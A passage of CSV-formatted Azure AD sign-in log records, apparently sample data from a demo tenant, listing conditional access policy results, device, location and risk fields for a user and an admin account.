'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f81997e3-0b26-42cc-8532-c4de32a20700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,f81997e3-0b26-42cc-8532-c4de32a20700,SigninLogs,Sucess,50.6406517,5.572050095
+1528,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:40.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1294a39-2825-4728-bbb6-7616855480a8,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f81997e3-0b26-42cc-8532-c4de14a30700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,f81997e3-0b26-42cc-8532-c4de14a30700,SigninLogs,Sucess,50.6406517,5.572050095
+1529,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:56.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c97eedf1-31c9-4422-a5fd-4abc282621ac,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:54,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",9cf72c2b-aa6a-41ec-adc7-3fa2ce7d0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,9cf72c2b-aa6a-41ec-adc7-3fa2ce7d0800,SigninLogs,Sucess,34.06555176,-118.2405396
+1530,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:19.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f0b0e318-3997-4e0d-8f60-13e6da0333d1,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:38,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",13ab9514-e229-4755-99bf-dc8815850700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,13ab9514-e229-4755-99bf-dc8815850700,SigninLogs,Sucess,50.6406517,5.572050095
+1531,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:13.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85e4c9c1-85ec-43a1-aff8-92f658c91130,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:53,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d3a3c86e-d6a1-4323-9bc0-1a26cc700600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d3a3c86e-d6a1-4323-9bc0-1a26cc700600,SigninLogs,Sucess,34.06555176,-118.2405396
+1532,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:23.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,504c2262-a8bd-41e3-b557-c74af5928bc0,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:53,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d3a3c86e-d6a1-4323-9bc0-1a269c710600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d3a3c86e-d6a1-4323-9bc0-1a269c710600,SigninLogs,Sucess,34.06555176,-118.2405396
+1533,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:56.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c97eedf1-31c9-4422-a5fd-4abc282621ac,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:54,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",9cf72c2b-aa6a-41ec-adc7-3fa2ce7d0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,9cf72c2b-aa6a-41ec-adc7-3fa2ce7d0800,SigninLogs,Sucess,34.06555176,-118.2405396
+1534,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:49.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,971f0471-f879-4885-bdda-424823b9a62a,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f4c49c86-cb9e-4a04-9dcc-1dcd207f0500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,f4c49c86-cb9e-4a04-9dcc-1dcd207f0500,SigninLogs,Sucess,50.6406517,5.572050095
